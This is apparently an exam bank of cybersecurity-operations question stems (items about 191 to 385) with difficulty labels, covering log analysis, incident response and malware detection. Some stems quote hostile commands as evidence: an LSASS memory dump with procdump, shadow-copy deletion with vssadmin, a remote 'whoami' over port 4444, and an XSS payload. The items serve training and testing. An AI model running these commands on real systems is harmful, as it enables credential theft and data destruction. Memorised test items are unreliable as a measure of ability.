A large e-commerce company experiences a data breach where customer credit card numbers are stolen. The investigation reveals that an attacker exploited a SQL injection vulnerability in the web application to extract the data from the database. The company's web development team claims they use parameterized queries and prepared statements. However, the forensic analysis shows that the injection occurred through a search functionality that concatenates user input directly into the SQL query. The application logs indicate that the search function was developed by a third-party vendor and integrated into the application six months ago. The company wants to prevent such incidents in the future. Which of the following is the most effective long-term solution?

Hard
191

A security analyst is reviewing the organization's defense-in-depth strategy. The analyst must recommend TWO controls that specifically reduce the risk of successful phishing attacks against employees. Which two controls should the analyst recommend? (Choose two.)

Medium
192

A security analyst is investigating a recent security incident and needs to determine the extent of the compromise. The analyst wants to understand which systems were affected and what data may have been accessed. Which phase of the incident response process is the analyst currently performing?

Medium
193

A security analyst is configuring a new SIEM platform. The organization has multiple log sources, including Windows Event Logs, Linux syslog, and firewall logs. The analyst wants to ensure that logs are not lost if the SIEM becomes unavailable. Which approach best addresses this requirement?

Medium
194

A Linux host has an unusual cron job that runs a script from /tmp every minute. The analyst checks /etc/crontab and /var/spool/cron/ but finds nothing. Where else could the cron job be defined?

Hard
195

A SOC analyst is investigating a suspected ARP poisoning attack on a local subnet. Which two indicators would most strongly support this conclusion? (Choose two.)

Hard
196

A security analyst is analyzing system logs and notices multiple failed authentication events followed by a successful login from the same user account, and then a privilege escalation event. Which THREE events should be correlated to detect a potential attack?

Medium
197

An analyst observes that an internal host is sending ICMP echo requests with payloads containing random data to an external IP. The payload size is larger than typical. What is the most likely technique?

Hard
198

A security policy mandates that all administrative access to network devices must be encrypted. Which of the following protocols should be used to comply with this policy?

Easy
199

A hospital must protect patient records under a regulation that specifies administrative, physical, and technical safeguards for electronic protected health information. Which U.S. regulation establishes these requirements?

Easy
200

An analyst is reviewing alerts from an IDS. A signature matched 'script' and 'alert' in HTTP request parameters. The analyst inspects the packet and sees <script>alert('XSS')</script> in the URI. What is the most accurate classification of this alert?

Medium
201

A security analyst is monitoring network traffic and notices a high volume of TCP SYN packets sent to various ports on a single host. Which type of attack is most likely occurring?

Easy
202

Which TWO of the following are valid sources of security monitoring data in a Cisco security architecture?

Medium
203

An analyst is investigating a potential security incident and reviews the Cisco ASA firewall logs. The logs show the following entry: 'Deny tcp src outside:203.0.113.5/443 dst inside:10.1.1.10/3389'. Which of the following does this log entry indicate?

Hard
204

An analyst is reviewing DNS logs and sees repeated queries from an internal workstation to randomly generated subdomains of a single domain, such as a1b2c3.example.com, d4e5f6.example.com, and so on. The responses are consistently NXDOMAIN. Which technique is most consistent with this pattern?

Hard
205

A company's security policy includes a clause that all software installed on company devices must be approved by the IT department. An employee installs an unapproved application that later causes a malware infection. Which policy was violated?

Hard
206

While reviewing firewall logs, an analyst notices repeated inbound connections from a single external IP to multiple internal hosts on TCP port 3389 within a short time window. Each connection lasts only a few seconds and is followed by a new connection to a different internal host. Which activity does this pattern most likely represent?

Easy
207

During a security incident, the CISO decides to contain a compromised server by isolating it from the network. Which role is primarily responsible for making this containment decision based on business impact?

Hard
208

An analyst is correlating telemetry after a suspected Kerberoasting attack against an Active Directory environment. Which two artifacts, when found together, most strongly support that the attack succeeded in obtaining crackable service ticket material? (Choose two.)

Hard
209

Which THREE are typical sources of log data used in security monitoring? (Choose three.)

Hard
210

A junior analyst is asked to identify which log source would best confirm that an internal workstation attempted to resolve a suspicious domain shortly before an alert fired. The environment forwards DNS query logs from its recursive resolvers to the SIEM. Which action should the analyst take first?

Easy
211

A security analyst is assessing the risk profile of a new cloud-based collaboration application that employees want to adopt. The analyst must identify which factors contribute to the overall risk of introducing this application into the environment. (Choose two.)

Medium
212

A security analyst is examining a Linux system for signs of a rootkit. The analyst runs `lsmod` and notices a kernel module named `hideproc` that is not recognized. The analyst then runs `rmmod hideproc` but receives an error that the module is in use. Which of the following is the MOST likely reason the module cannot be removed?

Hard
213

An analyst is investigating a Windows system for potential malware persistence. The analyst discovers a scheduled task that runs a PowerShell script every hour. The script downloads and executes a payload from a remote server. Which of the following Windows artifacts would BEST provide the original creation time and the author of this scheduled task?

Medium
214

During an incident, a first responder pulls the network cable of a compromised server. Later, the incident response team is unable to collect volatile data such as running processes. Which policy or procedure was violated?

Hard
215

A security analyst is reviewing the organization's data classification policy. The policy defines four levels: Public, Internal, Confidential, and Restricted. A new marketing campaign document contains strategic pricing information that, if disclosed, could cause competitive harm. According to typical data classification practices, how should this document be classified?

Medium
216

A SOC analyst reviews a firewall log with the following entry: action=deny, source IP=192.168.1.100, destination IP=10.0.0.1, destination port=22. The analyst knows that 10.0.0.1 is an SSH server. What does this log entry indicate?

Medium
217

An analyst is investigating a suspected ARP poisoning attack on a local subnet. The analyst captures traffic and reviews ARP packets. Which two characteristics would most likely indicate that ARP poisoning is occurring? (Choose two.)

Medium
218

An analyst finds a registry modification under 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'. What is the primary use of this registry key?

Medium
219

A security analyst notices that an internal web server is receiving HTTP requests where the User-Agent string is identical across thousands of requests originating from a single external IP address, and each request targets a different URL path on the server. The requests occur at a rate of several hundred per second. Which activity does this pattern most likely represent?

Easy
220

A security engineer discovers that an attacker has inserted fake entries into a DNS resolver's cache, redirecting users to a malicious website. Which attack has occurred?

Medium
221

A SOC analyst is reviewing NetFlow records exported from a border router and notices a single internal host initiating outbound connections to more than 300 distinct external IP addresses on TCP port 443 within a five-minute window, with each flow carrying only a few hundred bytes. Which security monitoring conclusion is best supported by this evidence?

Medium
222

A security analyst is implementing multifactor authentication. Which TWO are considered factors? (Select two.)

Easy
223

An analyst is using Volatility to analyze a memory dump. Which TWO plugins are most effective for detecting code injection?

Hard
224

What is the primary purpose of a digital certificate in a Public Key Infrastructure (PKI)?

Medium
225

Which protocol is used by SNMP to send traps from network devices to the management station?

Easy
226

Which element of the CIA triad ensures that data cannot be modified by unauthorized parties?

Easy
227

A company needs to comply with regulations that protect personal data of EU citizens. Which TWO compliance frameworks are directly relevant to this requirement? (Choose two.)

Easy
228

A security analyst is reviewing Windows Event Logs on a domain controller. The analyst sees multiple Event ID 4769 (Kerberos service ticket was requested) with the same user account but different service names, occurring in a short time frame. Which of the following attacks is MOST likely indicated?

Medium
229

A security analyst notices a sudden spike in NetFlow data from a single workstation to multiple external IP addresses on port 443. What is the most likely explanation for this traffic pattern?

Easy
230

A security policy requires that employees use strong passwords. Which TWO of the following are characteristics of a strong password? (Select two.)

Easy
231

A network engineer configures a SPAN port to send traffic from a critical server to an IDS. After configuration, the IDS sees no traffic. What is the most likely issue?

Medium
232

A company wants to protect its internal network from external threats. Which security principle involves deploying multiple layers of security controls?

Easy
233

A host-based analysis tool reports that a file has a digital signature that is valid but from an untrusted publisher. What should the analyst interpret from this?

Medium
234

During a network intrusion analysis, a security analyst observes repeated TCP SYN packets sent to a range of ports on a target host, each followed by an RST response. No subsequent ACK packets are observed. Which phase of the Cyber Kill Chain is the attacker most likely executing?

Medium
235

Drag and drop the steps for initial configuration of a Cisco IOS device after booting into the correct order.

Medium
236

While analyzing a packet capture in Wireshark, an analyst observes a series of TCP packets with the PSH, ACK flags set and a payload containing the string 'cmd.exe /c whoami'. The destination port is 4444. Which type of activity is most likely indicated?

Medium
237

An analyst is investigating a potential malware infection. Which TWO of the following are indicators of command and control (C2) communication?

Medium
238

During incident response, an analyst notices that a compromised host is making outbound SMB connections to several internal servers on TCP port 445 using the same domain user account within minutes. Which activity is most likely occurring?

Hard
239

A security analyst is reviewing the organization's incident response plan. The plan currently defines containment, eradication, and recovery but does not include a formal step to determine the root cause of an incident. Which phase of the NIST SP 800-61 incident response lifecycle should the analyst add to address this gap?

Medium
240

An analyst is investigating a Windows system for signs of malware persistence. Which TWO registry locations are commonly used by malware to achieve automatic startup? (Choose two.)

Medium
241

A security analyst is assessing the risks to a company's data. The analyst identifies a vulnerability in the web application that could allow SQL injection. Which TWO terms correctly describe the elements of this risk scenario? (Choose two.)

Easy
242

An analyst is examining a Windows system for evidence of credential dumping. The analyst runs 'Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4688}' and filters for processes with 'lsass.exe' as the target. The output shows that a process named 'procdump.exe' was executed with the command line 'procdump.exe -ma lsass.exe lsass.dmp'. Which type of attack does this indicate?

Hard
243

A security analyst notices repeated failed login attempts to a critical server from a single external IP address over the past 30 minutes. The SIEM has a correlation rule that triggers an alert when the threshold of 10 failed attempts in 5 minutes is exceeded. However, no alert was generated. What is the most likely cause?

Medium
244

A company wants to ensure that employees report security incidents immediately. Which policy element is most important to include?

Easy
245

An analyst finds a YARA rule that matches a file containing the string 'MZ' at offset 0 and includes 'CreateRemoteThread'. This rule likely identifies:

Medium
246

A security analyst reviews logs and finds multiple failed login attempts from a single IP. This is indicative of what type of attack?

Medium
247

A security policy states that user activity logs must be retained for at least one year. What is the primary purpose of this requirement?

Easy
248

An attacker uses a tool to scan all IP addresses in a range to identify which hosts are online and what services are running. Which type of reconnaissance is this?

Medium
249

A network engineer sees the following event in the firewall logs: 'STATUS: intrusion prevented, action: drop, signature: "SQL Injection - SELECT"' on traffic from internal IP to a web server. What type of attack was detected?

Easy
250

After resolving a security incident, the IR team conducts a lessons learned meeting. Which of the following are typical outputs of this post-incident activity? (Choose three.)

Medium
251

A Windows event log review shows Event ID 4625 multiple times from a single source IP. What does this event indicate, and which log contains it?

Medium
252

An analyst sees an alert from the IDS: 'ET TROJAN Possible Zeus Variant Outbound Connection'. What action should the analyst take first?

Easy
253

Which compliance framework specifically addresses the protection of cardholder data?

Medium
254

A security analyst is examining a network capture and observes that an attacker is sending a large volume of SYN packets to a web server with spoofed source IP addresses. The server's connection table is filling up, and legitimate users cannot connect. Which type of attack is the analyst observing?

Medium
255

A security analyst is reviewing the organization's password policy, which currently requires a minimum of eight characters with complexity but no expiration. After a recent audit finding, management wants to align with modern best practices. Which change should the analyst recommend?

Medium
256

Which OSI layer is responsible for logical addressing and routing?

Easy
257

Match each log severity level to its description (syslog).

Medium
258

An analyst observes a series of DNS queries for subdomains like 'ZGVzdGluYXRpb24= .malicious.com' where the subdomain part appears base64-encoded. The volume of DNS traffic from a single host is unusually high. Which exfiltration technique is most likely in use?

Medium
259

An organization's security policy states that all external connections must be authenticated using multi-factor authentication. Which type of policy is this?

Medium
260

Which TWO of the following are functions of a SIEM system in security monitoring?

Easy
261

A company's security policy states that employees must not use corporate laptops for personal web browsing. An employee is found to have streamed video during work hours, consuming significant bandwidth. What is the best course of action?

Easy
262

A security analyst is investigating a potential security incident and needs to correlate events across multiple data sources. Which two Cisco CyberOps tools or features would provide network flow data and intrusion event details respectively? (Choose two.)

Medium
263

During a security incident, a SOC analyst finds that the SIEM is not receiving logs from a critical firewall due to a network issue. The analyst needs to ensure that no alerts are missed during the outage. What should the analyst do?

Hard
264

A SIEM correlation rule triggers when it detects more than 10 failed login attempts from the same source IP within 1 minute. Which type of attack is this rule designed to detect?

Medium
265

An organization has implemented a new password policy requiring 12-character passwords with complexity. Which risk treatment option is this an example of?

Medium
266

Refer to the exhibit. A firewall log shows denied TCP traffic from an internal host to an external IP on consecutive ports. What type of activity is indicated?

Hard
267

A SIEM correlation rule is configured to alert when there are 10 failed login attempts from the same source IP within 1 minute. An analyst receives an alert for source IP 10.0.0.5. Which type of attack is most likely being detected?

Medium
268

An analyst is investigating a host that is suspected of being compromised. She runs the 'netstat -anb' command and sees an established connection to an unknown IP address on port 4444. The associated process is svchost.exe. Which conclusion is MOST appropriate?

Medium
269

You are a security administrator for a company with 500 employees. The company uses a SIEM with basic correlation rules. Recently, the HR department reported that several employees received phishing emails with a link to a fake login page. The emails bypassed the spam filter. You want to detect if any employees clicked the link. You have access to web proxy logs, DNS logs, and endpoint antivirus logs. The phishing link is 'http://malicious-login.com/verify'. Which action should you take first to identify affected users?

Medium
270

A security analyst is investigating a breach where an attacker gained access to a server by exploiting a vulnerability in a web application. The analyst needs to determine the type of attack that was used. The server logs show that the attacker sent a specially crafted HTTP request that caused the server to execute arbitrary code. Which type of attack is this?

Hard
271

An analyst is using Zeek to monitor network traffic. Which THREE types of logs can Zeek generate to provide visibility into application-layer activity?

Hard
272

A SOC analyst is reviewing a PCAP captured at the perimeter firewall. The analyst notices that a single internal host has sent TCP segments with the FIN, PSH, and URG flags all set simultaneously to multiple destination ports on several external hosts. No corresponding ACK, SYN, or RST packets are observed in the capture. Which type of scan is the analyst most likely observing?

Medium
273

An organization must retain security logs for at least one year due to regulatory compliance. However, their SIEM storage is limited. Which strategy best balances compliance and storage?

Hard
274

A SOC receives a threat intelligence feed indicating that a specific SHA-256 hash belongs to a trojan. An analyst searches the endpoint telemetry and finds no process with that hash, but the file name appears in several temporary directories. Which explanation best accounts for this result?

Hard
275

A network security analyst is reviewing traffic logs and notices a series of connections from an internal host to a known command-and-control (C2) server. The connections occur every 5 minutes and are small in size. Which of the following is the MOST likely explanation for this traffic pattern?

Medium
276

A security analyst is tuning a SIEM to detect lateral movement. Which THREE log sources would provide the most useful data for this purpose? (Choose THREE.)

Medium
277

In Security Onion, an analyst runs 'squert' and sees a high number of alerts from a single source IP across multiple destination ports. What is the most likely cause?

Medium
278

A Windows Event Log shows Event ID 4625 multiple times from the same source IP address. What type of activity does this indicate?

Medium
279

A security analyst is investigating an alert from a host-based intrusion detection system (HIDS) that detected a file modification in the system32 directory. Which log source should the analyst check first to understand the process that made the change?

Medium
280

A security analyst is reviewing baseline network traffic and notices that the normal HTTP traffic volume has increased by 300% over the past hour. The increase is from a single client IP to a single external web server. What does this indicate?

Medium
281

A security analyst is examining a memory dump from a compromised host and finds a small piece of code that resides only in memory, has no corresponding file on disk, and injects itself into a running legitimate process. The code does not replicate to other systems. Which type of malware best describes this?

Hard
282

To protect sensitive data at rest, a company uses AES-256 encryption. This primarily ensures which security goal?

Hard
283

A company's security policy requires that all remote access connections be authenticated using a certificate. Which type of control is this?

Hard
284

An analyst reviewing network alerts notices a rule triggered for 'ET SCAN NMAP -sU scan' based on traffic to a Linux server. The packet capture shows multiple UDP packets to various ports, and for closed ports, the server responds with ICMP Destination Unreachable (Port Unreachable). Which type of scan is being performed, and how should the analyst classify this alert?

Hard
285

During a security incident, an analyst needs to preserve network evidence for forensic analysis. Which action should be taken first?

Medium
286

A threat hunter is examining a Windows 10 host and wants to determine whether a suspicious executable was recently run by a user. The hunter knows that Windows records application execution history in the registry under the UserAssist key. Which location should the hunter inspect to find this data for the currently logged-on user?

Hard
287

Which TWO of the following are best practices for implementing a security policy?

Medium
288

An analyst is monitoring network traffic and sees a large number of TCP SYN packets sent to various ports on a single host from the same source IP. Which type of attack is most likely occurring?

Easy
289

A company is implementing a security policy to reduce risk. Which THREE activities are examples of risk mitigation? (Choose three.)

Hard
290

Which THREE components are part of a Public Key Infrastructure (PKI)? (Choose three.)

Hard
291

Which term describes a weakness in a system that could be exploited by a threat?

Easy
292

A security analyst is correlating network and endpoint telemetry to detect a host infected with malware that is attempting to establish persistence and communicate externally. Which TWO artifacts would best support this investigation? (Choose two.)

Medium
293

An analyst examines PCAP and sees multiple SMB sessions from internal host 10.1.1.10 to 10.1.1.20, 10.1.1.30, and 10.1.1.40 within seconds. The NTLM authentication contains a hash parameter that is identical across sessions. Which lateral movement technique is most likely being used?

Hard
294

During incident response on a Linux server, an analyst runs 'ss -tlnp' and sees an SSH service listening on a non-standard high port. Which step should the analyst take next to investigate potential unauthorized access?

Medium
295

Which TWO of the following are characteristics of behavioral-based anomaly detection in network monitoring? (Select 2)

Hard
296

A SOC team is evaluating a SIEM rule that triggers on 'more than 10 failed login attempts from a single source within 5 minutes.' The rule is generating too many alerts from a legitimate external monitoring service. How should the rule be modified?

Hard
297

A SOC Tier 1 analyst is processing alerts. Which THREE tasks are typical for a Tier 1 analyst? (Select three.)

Hard
298

A security analyst is investigating a Linux server that is suspected of being compromised. The analyst runs 'ls -l /proc/1234/exe' and sees the output: '/proc/1234/exe -> /tmp/.hidden/backdoor (deleted)'. What does this output indicate?

Hard
299

A SIEM correlation rule is designed to detect a brute-force attack. The rule triggers when an event includes 10 or more failed logins from the same source IP within 1 minute. An analyst sees an alert for 12 failed logins from IP 10.0.0.1 in 2 minutes. Why did the rule not trigger?

Medium
300

A network analyst notices that a host is sending a large volume of traffic to an external IP address on port 443 during non-business hours. The traffic volume is significantly higher than the established baseline. Which type of data exfiltration technique should be suspected?

Medium
301

A SOC analyst is investigating a potential malware outbreak. Which THREE actions should the analyst take to preserve evidence? (Select three.)

Medium
302

During forensic analysis of a Windows host, an analyst finds a file in C:\Windows\Prefetch with the name 'MALWARE.EXE-3F2A1B0C.pf'. Which type of information can be extracted from this prefetch file to assist the investigation?

Hard
303

A SOC analyst is reviewing alerts from a network-based intrusion detection system (NIDS). An alert indicates a potential SQL injection attempt, but the destination server is a web application that accepts SQL queries as part of its normal function. What should the analyst do?

Medium
304

A company uses Snort for intrusion detection. The analyst receives an alert for 'ET POLICY Outgoing DNS Query to Possible Malicious Domain'. The destination IP is 203.0.113.5. The analyst checks the DNS query and finds it is for 'update.software.com', which is a legitimate update server. However, the Snort rule triggered because the domain was recently added to a threat intelligence feed. What is the most likely cause of this false positive?

Medium
305

An analyst is reviewing PCAP from a network intrusion. The attacker used a payload with ROP gadgets and shellcode. Which TWO exploitation indicators are associated with this attack? (Choose two.)

Hard
306

Match each Windows event log type to its description.

Medium
307

A security analyst is establishing a data classification policy. Which TWO categories are commonly included in a data classification policy?

Easy
308

A security analyst is triaging a Windows server that may have been compromised. The analyst needs to identify which network connections are currently established by processes on the host and which executable is responsible for each connection. Which two native tools provide this information? (Choose two.)

Medium
309

A small retail company has a security policy that requires all point-of-sale (POS) systems to be isolated on a separate network segment with strict firewall rules. During a network audit, you discover that the POS system is connected to the same network as the office workstations, violating policy. The store manager says it was done for convenience because the network cable was too short. What is the best course of action?

Easy
310

A security analyst observes repeated ICMP port unreachable responses from a target host. The source IP is sending packets to multiple UDP ports. Which type of scan is most likely being performed?

Easy
311

An analyst is investigating a Windows system for signs of malware persistence. Which registry key is commonly used by malware to run automatically at user logon?

Easy
312

An organization is implementing a new remote access policy. Which of the following is a key component that should be included in this policy?

Medium
313

An analyst is analyzing a suspicious PE file. The file's entropy is high (close to 8.0), and the section names appear random. What does this likely indicate?

Hard
314

An analyst is examining a YARA rule that contains the condition: 'uint16(0) == 0x5a4d and filesize < 500KB'. What type of file is this rule targeting?

Hard
315

A security analyst is examining a Linux system for signs of a compromised user account. The analyst runs `grep ':0:0:' /etc/passwd` and finds an entry for user `backup` with UID 0. The legitimate backup user should have a UID of 1001. Which of the following is the MOST likely explanation?

Medium
316

Which THREE of the following are best practices for implementing security logging and monitoring? (Select 3)

Medium
317

You are a security analyst at a medium-sized company. A user reports that their workstation is running slowly and the network is sluggish. You check the firewall logs and see a large number of outgoing connections from the user's workstation to an external IP address (198.51.100.23) on port 4444. The connections are short-lived and occur every few seconds. The workstation has standard corporate antivirus installed, which is up-to-date and shows no threats. You have also noticed that the workstation is making DNS queries to an unusual domain (malicious.example.com) that resolves to the same external IP. What is the most appropriate immediate action?

Easy
318

A Windows analyst uses Process Explorer to investigate parent-child relationships. Which TWO characteristics are commonly associated with malicious processes?

Easy
319

During a security assessment, a SOC analyst notices an IDS/IPS alert with a severity of 'High' for a signature named 'ET TROJAN Win32.Vobfus Checkin'. The alert shows source IP 10.0.0.5 and destination IP 203.0.113.50 on port 443. What is the most likely interpretation of this alert?

Hard
320

A security analyst is reviewing a packet capture in Wireshark and notices a series of DNS queries for randomly generated domain names such as 'a1b2c3d4e5.com', 'f6g7h8i9j0.net', and 'k1l2m3n4o5.org'. The queries are sent to multiple different DNS servers. Which type of malicious activity does this pattern most likely indicate?

Medium
321

A financial institution is implementing a data classification policy. The policy defines four levels: Public, Internal, Confidential, and Restricted. The security team must ensure that data labeled 'Restricted' receives the highest level of protection, including encryption, strict access controls, and monitoring. Which data classification level is typically subject to the most stringent regulatory requirements and requires the strongest security controls?

Hard
322

A security administrator needs to verify that a downloaded file has not been altered during transit. Which cryptographic technique should be used?

Easy
323

A network security analyst is reviewing NetFlow records from a Cisco router and notices a large number of flows from a single internal host to many external IP addresses on port 445. The flows are short, with small packet counts, and occur within a few minutes. Which type of activity is most likely occurring?

Medium
324

A security operations center (SOC) analyst is investigating a security incident where an attacker gained initial access to a corporate network. The analyst suspects the attacker used a technique that involves exploiting a vulnerability in a public-facing web server to execute arbitrary code. Which phase of the Cyber Kill Chain does this activity represent?

Hard
325

Which TWO of the following are key components of a security policy? (Choose two.)

Easy
326

Which type of malware is designed to encrypt files on a victim's system and demand payment for the decryption key?

Medium
327

A CyberOps analyst is examining a Windows workstation and finds that a scheduled task named 'MicrosoftEdgeUpdateTask' exists in Task Scheduler, but the Task Scheduler GUI shows it as disabled. The analyst suspects it was created by malware to masquerade as a legitimate updater. Which artifact should the analyst check to determine the exact executable path and arguments the task would run if it were enabled?

Hard
328

A security analyst is reviewing the organization's data classification policy. The policy defines four levels: Public, Internal, Confidential, and Restricted. The analyst is asked to classify a document that contains the company's proprietary source code. According to typical data classification standards, which classification level is most appropriate?

Hard
329

An analyst is reviewing Windows Security Event Logs and finds Event ID 4648. What does this event indicate?

Medium
330

A Cisco Firepower analyst notices repeated syslog messages from an ASA firewall showing TCP connections to 203.0.113.55:4444 that are reset immediately after the three-way handshake. The source hosts are internal workstations running an outdated browser plugin. Which security monitoring data source would best confirm whether these workstations established a command-and-control channel?

Medium
331

An organization's security policy mandates that all external media (USB drives, external hard drives) must be scanned for malware before use. An employee inserts a USB drive to transfer a presentation for a meeting. The employee runs the antivirus scan, but it fails to complete because the USB drive has a hardware write-protect switch. The employee is in a hurry. What should the employee do?

Easy
332

Which role in the incident response process is primarily responsible for determining the business impact of an incident and making strategic decisions?

Medium
333

A security analyst is evaluating an endpoint detection and response deployment for a company that must detect fileless attacks. Which TWO techniques should the analyst expect the tool to monitor because they are commonly used by fileless malware? (Choose two.)

Medium
334

During a network intrusion analysis, an analyst observes a series of TCP packets with the FIN flag set but no corresponding ACK, followed by packets with the RST flag set. What is the most likely explanation for this traffic pattern?

Hard
335

A company implements a policy where users must authenticate with a password and a one-time code from a token. Which AAA component is strengthened by this policy?

Hard
336

A security manager is updating the organization's security awareness program after several incidents caused by employees inserting found USB drives. The manager wants a control that both reduces the likelihood of this behavior and provides a measurable metric for the awareness program. Which approach best meets both goals?

Hard
337

A mid-size healthcare company has completed its annual review of security documentation. The CISO asks the governance team to align the documents into a clear hierarchy, where a single high-level document states the organization's overall security intentions and direction, and all subordinate documents must conform to it. Which document should the governance team treat as the highest-level authority?

Easy
338

A Cisco CyberOps analyst is reviewing a network security monitoring console and must determine which TWO data sources are most useful for detecting lateral movement by an attacker who has already compromised a workstation. (Choose two.)

Hard
339

Which of the following is an example of an Indicator of Compromise (IoC)?

Easy
340

A security analyst is analyzing a Linux system suspected of being used as a phishing server. Which THREE artifacts should the analyst examine to identify persistence mechanisms? (Select 3)

Hard
341

An incident handler needs to preserve a hard drive from a compromised system. Which two actions are essential to maintain the integrity of the evidence?

Medium
342

An analyst is reviewing a memory dump and uses Volatility's cmdline plugin to view process command lines. One process shows command line arguments that include a long base64-encoded string. What should the analyst suspect?

Hard
343

A security analyst discovers that an employee's computer is infected with malware that encrypts files and demands payment. What type of malware is this?

Easy
344

Which of the following best describes the relationship between a vulnerability, threat, and risk in cybersecurity?

Easy
345

A network security analyst reviews a packet capture from a compromised host and sees repeated outbound DNS queries for long, random-looking subdomains such as 'a3f9c2b81e7d4.example-cdn.net', each followed by a small response and no subsequent connection to the returned address. Which interpretation is most accurate?

Medium
346

During a network intrusion investigation, an analyst notices repeated SMB authentication attempts from a single host to multiple other hosts using different usernames. Which type of activity does this pattern suggest?

Medium
347

A security analyst is reviewing NetFlow records and notices a host sending data to an external IP at regular intervals during non-business hours. Which flow characteristic is most indicative of data exfiltration?

Hard
348

A security analyst is examining web server logs and finds an entry with method 'POST', URL '/login.php', response code '200', and user-agent 'Mozilla/5.0'. The log shows 100 similar entries from the same IP within 5 seconds. What is the most likely activity?

Medium
349

An analyst suspects a host is communicating with a command-and-control server using DNS tunneling. Which THREE network traffic patterns would support this hypothesis?

Hard
350

A security analyst is reviewing Snort IDS alerts and sees the following rule triggered: alert tcp $HOME_NET any -> $EXTERNAL_NET 80 (msg:'Possible SQL Injection'; content:'UNION'; nocase; sid:1000001;). Which action will Snort take when it detects matching traffic?

Hard
351

A company wants to monitor for unauthorized wireless access points. Which technique should they implement?

Easy
352

During an incident, an analyst observes the following in PCAP: (1) DNS queries with random-looking subdomains to a known malicious domain, (2) large outbound FTP transfers of .zip files, (3) HTTP POST requests with Base64-encoded data in the body. Which THREE exfiltration techniques are being used? (Select 3)

Hard
353

A security analyst observes a large number of SYN packets sent to various ports on a target host, receiving RST responses for closed ports and no response for open ports. Which phase of the Cyber Kill Chain does this activity represent?

Medium
354

A SOC analyst monitors outbound traffic from a corporate network and notices a single internal host contacting an external server on TCP port 53, but the payloads contain fixed-length, non-DNS binary data with no query/response structure. The host also makes outbound connections to the same external IP on TCP port 4444. Which technique is the attacker most likely using?

Medium
355

An analyst is monitoring network traffic and observes a large number of TCP SYN packets sent to a single host on various ports with no corresponding SYN-ACK replies. This behavior is most indicative of which type of attack?

Easy
356

Which TWO are common indicators of a phishing email? (Select two.)

Medium
357

A security analyst is investigating an alert about a workstation that is repeatedly resolving domain names for known malicious command-and-control servers. The analyst wants to determine whether the workstation is infected with malware that uses DNS for communication. Which type of malware behavior is most likely occurring?

Easy
358

In the NIST SP 800-61 Rev 2 incident response process, which phase involves activities such as performing lessons learned and updating the incident response plan?

Easy
359

A firewall log shows a connection from internal IP 192.168.1.100 to external IP 203.0.113.5 on port 443 with action 'deny'. What does this indicate?

Medium
360

An analyst examines a PCAP file and sees a series of HTTP POST requests to an external server with Base64-encoded payloads in the request body. The payloads decode to small text strings. Which type of data exfiltration technique is being used?

Hard
361

During a host investigation on a Windows 10 endpoint, an analyst wants to review the history of commands typed into PowerShell consoles by interactive users. Which artifact should the analyst examine?

Easy
362

Which security policy defines acceptable use of an organization's IT resources, including internet browsing and email?

Easy
363

In Linux forensics, which file would an analyst check to see command history of a user, potentially revealing malicious commands executed?

Easy
364

Refer to the exhibit. An EDR alert shows this JSON event. What is the most significant indicator of a potential malware infection?

Easy
365

A security analyst at a retail company is reviewing DNS logs and notices a workstation repeatedly resolving random-looking subdomains such as a8f3k2.example-bad.com, followed by a long TXT record response containing encoded data. No user reported visiting any website. Which technique is most likely occurring?

Medium
366

Which THREE of the following are valid techniques to detect a compromised host using network monitoring?

Hard
367

A security analyst is reviewing the organization's data classification policy. The policy defines four levels: Public, Internal, Confidential, and Restricted. The analyst finds that a marketing team has stored a file containing customer credit card numbers on a shared drive accessible to all employees. The analyst must recommend the appropriate classification and handling for this file. What should the analyst recommend?

Hard
368

A security analyst is evaluating the organization's use of cryptographic algorithms. The analyst must identify which TWO algorithms are symmetric encryption algorithms that can be used for bulk data encryption. (Choose two.)

Medium
369

A security analyst is reviewing the organization's incident response plan. The plan defines several roles, including one responsible for coordinating all incident response activities and serving as the central point of communication. During a recent ransomware incident, this person was responsible for declaring the incident and ensuring that all stakeholders were informed. Which role does this describe?

Medium
370

A security analyst is examining a Linux web server that is suspected of being compromised. The analyst runs `ps aux` and notices a process named `apache2` running as the user `www-data`, but its parent process ID (PPID) is 1 (init/systemd). Normally, `apache2` is started by a master process. What is the most likely explanation for this anomaly?

Easy
371

A SOC analyst is triaging an alert from a network sensor indicating that an internal host may be performing host discovery on the local subnet. The analyst wants to identify active hosts without generating TCP connections. Which two techniques should the analyst expect to see in the packet capture that are consistent with this goal? (Choose two.)

Medium
372

A security analyst is examining a Windows 10 endpoint that is suspected of being infected with malware. The analyst runs 'Get-WinEvent -LogName Security | Where-Object {$_.Id -eq 4688}' and notices that a process named 'cmd.exe' was launched with the command line 'cmd /c vssadmin.exe delete shadows /all /quiet'. Which type of attack does this command indicate?

Easy
373

A security analyst discovers that an employee has been sharing login credentials with coworkers. Which policy violation is this?

Medium
374

A SOC analyst is reviewing Cisco Firepower Intrusion Event logs and notices a high volume of alerts for the signature 'SERVER-WEBAPP Apache Struts2 remote code execution attempt' coming from a single internal host to external web servers. The analyst needs to determine if this is a true positive or a false positive. Which of the following actions would BEST help make that determination?

Medium
375

An analyst identifies a PCAP with a reverse shell session. Which characteristic in the traffic would most likely indicate an interactive shell session?

Hard
376

A security analyst is examining a suspicious executable found on a compromised host. The analyst runs the file in a sandbox and observes that it creates a mutex named 'Global\MyMutex123', attempts to connect to an external IP address on port 443, and modifies the registry key HKLM\Software\Microsoft\Windows\CurrentVersion\Run. Which type of analysis is the analyst performing?

Hard
377

An analyst receives an IDS alert with signature name 'ET TROJAN Win32.Zeus Checkin' and severity 'high'. The alert shows source IP 192.168.1.50 and destination IP 198.51.100.20 on port 443. Which action should the analyst take FIRST?

Medium
378

During an incident response, the SOC needs to determine the scope of a compromise by identifying all hosts that communicated with a known malicious IP in the last 30 days. Which data source would best support this analysis?

Hard
379

During memory analysis using Volatility, an analyst wants to identify processes that may be hiding. Which TWO plugins are most useful for detecting hidden or injected code? (Choose two.)

Medium
380

A security analyst is reviewing a packet capture and notices that an attacker is sending a large number of SYN packets to a web server from spoofed source IP addresses. The server's connection table is filling up, and legitimate users cannot connect. Which type of attack is being described?

Hard
381

In a Zeek/Bro log, an analyst observes a connection with 'service' field set to 'dns' and 'query' field containing a long, random-looking subdomain. This could be indicative of which type of activity?

Hard
382

A security analyst needs to share threat intelligence with other organizations in a standardized, machine-readable format. Which combination of standards should the analyst use?

Hard
383

Which type of malware is designed to spread automatically across networks without user interaction?

Easy
384

During an incident, a forensic analyst needs to preserve evidence from a compromised hard drive. Which of the following steps is essential to maintain the chain of custody?

Hard
385

